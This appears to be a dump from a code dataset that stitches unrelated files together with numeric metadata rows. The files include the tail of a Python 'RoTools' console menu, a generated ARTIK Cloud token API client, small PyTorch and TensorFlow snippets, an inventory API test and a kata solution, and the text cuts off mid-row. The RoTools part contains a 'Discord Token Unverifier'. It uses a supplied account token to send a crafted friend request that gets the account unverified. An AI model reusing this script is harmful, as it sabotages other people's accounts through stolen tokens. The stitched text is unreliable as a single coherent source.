print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Unverifier {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
tokenunverifiertoken = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
headers = {'Authorization': tokenunverifiertoken, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
r = requests.post('https://discordapp.com/api/v8/users/@me/relationships', headers={'Authorization': tokenunverifiertoken, 'User-Agent': 'discordbot'}, json={'username': 'LMAO', 'discriminator': 6572})
if r.status_code == 204:
print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Token unverified')
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
DiscordMenu2()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Token unverifier failed")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
DiscordMenu2()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
DiscordMenu2()
#Windows Menu
def WindowsMenu():
os.system('title RoTools 0.1 - Windows Menu')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Windows Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║ ║")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Windows Power Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 0 | Main Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
WindowsMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
if WindowsMenuChoice == 1:
WindowsPower()
elif WindowsMenuChoice == 0:
MainMenu()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
input(f'\n{Fore.WHITE}Press [Enter] to return to Windows Menu')
WindowsMenu()
#Windows Menu > Windows Power Menu
def WindowsPower():
os.system('title RoTools 0.1 - Windows Power Menu')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Windows Power Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║ ║")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Log out {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 2 | Hibernate {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 3 | Shutdown {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 4 | Restart {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 0 | Windows Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
WindowsPowerChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
if WindowsPowerChoice == 1:
os.system('shutdown /l')
elif WindowsPowerChoice == 2:
os.system('shutdown /h')
elif WindowsPowerChoice == 3:
os.system("shutdown /s")
elif WindowsPowerChoice == 4:
os.system("shutdown /r")
elif WindowsPowerChoice == 0:
WindowsMenu()
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
input(f'\n{Fore.WHITE}Press [Enter] to return to Windows Power Menu')
WindowsPower()
#Main Menu
def MainMenu():
os.system('title RoTools 0.1 - Main Menu')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Main Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║ ║")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Credits {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 2 | Windows Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 3 | Discord Menu {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} 0 | Exit {Fore.CYAN}║")
print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
MainMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
if MainMenuChoice == 1:
Credits()
elif MainMenuChoice == 2:
WindowsMenu()
elif MainMenuChoice == 3:
DiscordMenu()
elif MainMenuChoice == 0:
os.system('exit')
else:
print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
input(f'\n{Fore.WHITE}Press [Enter] to return to Main Menu')
MainMenu()
MainMenu()
| 63.227124
| 210
| 0.417005
| 4,521
| 38,695
| 5.205043
| 0.060164
| 0.142444
| 0.127741
| 0.133265
| 0.864397
| 0.857768
| 0.852031
| 0.825812
| 0.781149
| 0.756757
| 0
| 0.008411
| 0.238041
| 38,695
| 612
| 211
| 63.227124
| 0.537987
| 0.038739
| 0
| 0.571154
| 0
| 0.017308
| 0.688239
| 0.262489
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030769
| false
| 0.021154
| 0.003846
| 0
| 0.034615
| 0.501923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
af0879907e6731874b7a61f5ed98f72faa28358a
| 14,121
|
py
|
Python
|
artikcloud/apis/tokens_api.py
|
artikcloud/artikcloud-python-dev
|
683cd8304f031913bcd581d1eb78ee0efbc5c113
|
[
"Apache-2.0"
] | null | null | null |
artikcloud/apis/tokens_api.py
|
artikcloud/artikcloud-python-dev
|
683cd8304f031913bcd581d1eb78ee0efbc5c113
|
[
"Apache-2.0"
] | null | null | null |
artikcloud/apis/tokens_api.py
|
artikcloud/artikcloud-python-dev
|
683cd8304f031913bcd581d1eb78ee0efbc5c113
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
ARTIK Cloud API
No descripton provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TokensApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def check_token(self, token_info, **kwargs):
"""
Check Token
(Deprecated) Check Token. See tokenInfo
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.check_token(token_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param TokenRequest token_info: Token object to be checked (required)
:return: CheckTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.check_token_with_http_info(token_info, **kwargs)
else:
(data) = self.check_token_with_http_info(token_info, **kwargs)
return data
def check_token_with_http_info(self, token_info, **kwargs):
"""
Check Token
(Deprecated) Check Token. See tokenInfo
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.check_token_with_http_info(token_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param TokenRequest token_info: Token object to be checked (required)
:return: CheckTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token_info']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method check_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token_info' is set
if ('token_info' not in params) or (params['token_info'] is None):
raise ValueError("Missing the required parameter `token_info` when calling `check_token`")
resource_path = '/accounts/checkToken'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'token_info' in params:
body_params = params['token_info']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['artikcloud_oauth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CheckTokenResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def refresh_token(self, grant_type, refresh_token, **kwargs):
"""
Refresh Token
Refresh Token
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.refresh_token(grant_type, refresh_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str grant_type: Grant Type. (required)
:param str refresh_token: Refresh Token. (required)
:return: RefreshTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.refresh_token_with_http_info(grant_type, refresh_token, **kwargs)
else:
(data) = self.refresh_token_with_http_info(grant_type, refresh_token, **kwargs)
return data
def refresh_token_with_http_info(self, grant_type, refresh_token, **kwargs):
"""
Refresh Token
Refresh Token
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.refresh_token_with_http_info(grant_type, refresh_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str grant_type: Grant Type. (required)
:param str refresh_token: Refresh Token. (required)
:return: RefreshTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['grant_type', 'refresh_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method refresh_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'grant_type' is set
if ('grant_type' not in params) or (params['grant_type'] is None):
raise ValueError("Missing the required parameter `grant_type` when calling `refresh_token`")
# verify the required parameter 'refresh_token' is set
if ('refresh_token' not in params) or (params['refresh_token'] is None):
raise ValueError("Missing the required parameter `refresh_token` when calling `refresh_token`")
resource_path = '/accounts/token'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'grant_type' in params:
form_params.append(('grant_type', params['grant_type']))
if 'refresh_token' in params:
form_params.append(('refresh_token', params['refresh_token']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['artikcloud_oauth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RefreshTokenResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def token_info(self, **kwargs):
"""
Token Info
Returns the Token Information
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.token_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: TokenInfoSuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.token_info_with_http_info(**kwargs)
else:
(data) = self.token_info_with_http_info(**kwargs)
return data
def token_info_with_http_info(self, **kwargs):
"""
Token Info
Returns the Token Information
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.token_info_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: TokenInfoSuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method token_info" % key
)
params[key] = val
del params['kwargs']
resource_path = '/accounts/tokenInfo'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['artikcloud_oauth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenInfoSuccessResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 38.687671
| 108
| 0.577367
| 1,459
| 14,121
| 5.379027
| 0.139822
| 0.047401
| 0.019878
| 0.027523
| 0.813201
| 0.769113
| 0.769113
| 0.741845
| 0.723496
| 0.712029
| 0
| 0.001079
| 0.343885
| 14,121
| 364
| 109
| 38.793956
| 0.845979
| 0.357694
| 0
| 0.656442
| 1
| 0
| 0.156495
| 0.03125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042945
| false
| 0
| 0.042945
| 0
| 0.147239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
afc61d40adf140be0256fb0016bc5687bc1ad8e4
| 157
|
py
|
Python
|
torch/ao/sparsity/__init__.py
|
ZackPashkin/pytorch
|
5b1f5c8f17ec4067dc9f9df98bbcc6757ab24444
|
[
"Intel"
] | 2
|
2021-06-24T00:47:33.000Z
|
2021-06-24T00:50:14.000Z
|
torch/ao/sparsity/__init__.py
|
Hior247/pytorch
|
5a2f41a2dbe575ff7ff7066fe642fd53006f0f36
|
[
"Intel"
] | null | null | null |
torch/ao/sparsity/__init__.py
|
Hior247/pytorch
|
5a2f41a2dbe575ff7ff7066fe642fd53006f0f36
|
[
"Intel"
] | null | null | null |
# Parametrizations
from .experimental.pruner.parametrization import PruningParametrization
# Pruner
from .experimental.pruner.base_pruner import BasePruner
| 26.166667
| 71
| 0.866242
| 15
| 157
| 9
| 0.6
| 0.237037
| 0.325926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082803
| 157
| 5
| 72
| 31.4
| 0.9375
| 0.146497
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
afd068d0d593d963369fcd640e6b76c40d9d7bc0
| 306
|
py
|
Python
|
res/TensorFlowPythonExamples/examples/add_n/__init__.py
|
juitem/ONE
|
8c6a4b7738074573b6ac5c82dcf1f6697520d1ed
|
[
"Apache-2.0"
] | 255
|
2020-05-22T07:45:29.000Z
|
2022-03-29T23:58:22.000Z
|
res/TensorFlowPythonExamples/examples/add_n/__init__.py
|
juitem/ONE
|
8c6a4b7738074573b6ac5c82dcf1f6697520d1ed
|
[
"Apache-2.0"
] | 5,102
|
2020-05-22T07:48:33.000Z
|
2022-03-31T23:43:39.000Z
|
res/TensorFlowPythonExamples/examples/add_n/__init__.py
|
juitem/ONE
|
8c6a4b7738074573b6ac5c82dcf1f6697520d1ed
|
[
"Apache-2.0"
] | 120
|
2020-05-22T07:51:08.000Z
|
2022-02-16T19:08:05.000Z
|
import tensorflow as tf
in1_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=(4, 4), name="Hole")
in2_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=(4, 4), name="Hole")
in3_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=(4, 4), name="Hole")
op_ = tf.compat.v1.math.add_n([in1_, in2_, in3_])
| 43.714286
| 76
| 0.705882
| 53
| 306
| 3.924528
| 0.377358
| 0.153846
| 0.192308
| 0.302885
| 0.721154
| 0.721154
| 0.721154
| 0.721154
| 0.721154
| 0.721154
| 0
| 0.079137
| 0.091503
| 306
| 6
| 77
| 51
| 0.669065
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb936443c8fb9cb3d86b99a9dda754107fc241ac
| 7,997
|
py
|
Python
|
api/test/api/responders_test/resource/test_inventory.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
api/test/api/responders_test/resource/test_inventory.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
api/test/api/responders_test/resource/test_inventory.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
###############################################################################
# Copyright (c) 2017-2020 Koren Lev (Cisco Systems), #
# Yaron Yogev (Cisco Systems), Ilia Abashin (Cisco Systems) and others #
# #
# All rights reserved. This program and the accompanying materials #
# are made available under the terms of the Apache License, Version 2.0 #
# which accompanies this distribution, and is available at #
# http://www.apache.org/licenses/LICENSE-2.0 #
###############################################################################
from unittest.mock import patch
from api.test.api.responders_test.test_data import base
from api.test.api.responders_test.test_data import inventory
from api.test.api.test_base import TestBase
class TestInventory(TestBase):
def test_get_objects_list_without_env_name(self):
self.validate_get_request(inventory.URL,
expected_code=base.BAD_REQUEST_CODE)
def test_get_objects_list_with_invalid_filter(self):
self.validate_get_request(inventory.URL,
params={
"invalid": "invalid"
},
expected_code=base.BAD_REQUEST_CODE)
def test_get_objects_list_with_non_boolean_subtree(self):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'sub_tree': base.NON_BOOL
},
expected_code=base.BAD_REQUEST_CODE)
@patch(base.RESPONDER_BASE_READ)
def test_get_objects_list_with_boolean_subtree(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'sub_tree': base.BOOL
},
mocks={
read: inventory.OBJECTS_LIST
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECT_IDS_RESPONSE
)
def test_get_objects_list_with_non_int_page(self):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page': base.NON_INT_PAGE
},
expected_code=base.BAD_REQUEST_CODE)
@patch(base.RESPONDER_BASE_READ)
def test_get_objects_list_with_int_page(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page': base.INT_PAGE
},
mocks={
read: inventory.OBJECTS_LIST
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECT_IDS_RESPONSE
)
def test_get_objects_list_with_non_int_pagesize(self):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page_size': base.NON_INT_PAGESIZE
},
expected_code=base.BAD_REQUEST_CODE)
@patch(base.RESPONDER_BASE_READ)
def test_get_objects_list_with_int_pagesize(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'page_size': base.INT_PAGESIZE
},
mocks={
read: inventory.OBJECTS_LIST
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECT_IDS_RESPONSE
)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_nonexistent_objects_list_with_env_name(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
},
mocks={
read: [],
check_env_name: True
},
expected_code=base.NOT_FOUND_CODE,
)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_objects_list_with_unkown_env_name(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
},
mocks={
read: [],
check_env_name: False
},
expected_code=base.BAD_REQUEST_CODE)
@patch(base.RESPONDER_BASE_READ)
def test_get_object_with_env_name_and_id(self, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'id': inventory.ID
},
mocks={
read: inventory.OBJECTS
},
expected_code=base.SUCCESSFUL_CODE,
expected_response=inventory.OBJECTS[0]
)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_nonexistent_object_with_env_name_and_id(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.ENV_NAME,
'id': inventory.NONEXISTENT_ID
},
mocks={
read: [],
check_env_name: True
},
expected_code=base.NOT_FOUND_CODE)
@patch(base.RESPONDER_BASE_READ)
@patch(base.RESPONDER_BASE_CHECK_ENVIRONMENT_NAME)
def test_get_object_with_unkown_env_name_and_id(self, check_env_name, read):
self.validate_get_request(inventory.URL,
params={
'env_name': base.UNKNOWN_ENV,
'id': inventory.ID
},
mocks={
read: [],
check_env_name: False
},
expected_code=base.BAD_REQUEST_CODE)
| 48.762195
| 85
| 0.421408
| 633
| 7,997
| 4.93049
| 0.159558
| 0.0785
| 0.041653
| 0.091637
| 0.806472
| 0.789491
| 0.783403
| 0.760013
| 0.728292
| 0.701378
| 0
| 0.003258
| 0.501063
| 7,997
| 163
| 86
| 49.06135
| 0.778947
| 0.063024
| 0
| 0.594203
| 0
| 0
| 0.020587
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094203
| false
| 0
| 0.028986
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bbd2e823867aa1a21c9e18ffaa4bdf4fe3e1d42d
| 145
|
py
|
Python
|
python/8kyu/add_numbers.py
|
Sigmanificient/codewars
|
b34df4bf55460d312b7ddf121b46a707b549387a
|
[
"MIT"
] | 3
|
2021-06-08T01:57:13.000Z
|
2021-06-26T10:52:47.000Z
|
python/8kyu/add_numbers.py
|
Sigmanificient/codewars
|
b34df4bf55460d312b7ddf121b46a707b549387a
|
[
"MIT"
] | null | null | null |
python/8kyu/add_numbers.py
|
Sigmanificient/codewars
|
b34df4bf55460d312b7ddf121b46a707b549387a
|
[
"MIT"
] | 2
|
2021-06-10T21:20:13.000Z
|
2021-06-30T10:13:26.000Z
|
# Kata url: https://www.codewars.com/kata/5926d7494b2b1843780001e6.
from typing import Tuple
def add(*n: Tuple[int]) -> int:
return sum(n)
| 20.714286
| 67
| 0.710345
| 21
| 145
| 4.904762
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 0.144828
| 145
| 6
| 68
| 24.166667
| 0.669355
| 0.448276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a550442093389369e7cd359e95717d7d3af699b0
| 89
|
py
|
Python
|
pyECLAT/__init__.py
|
jeffrichardchemistry/pyECLAT
|
c5cd6976e9703acc148072177192b9b1bff855d5
|
[
"BSD-2-Clause"
] | 17
|
2020-06-05T19:24:10.000Z
|
2021-12-30T12:41:41.000Z
|
pyECLAT/__init__.py
|
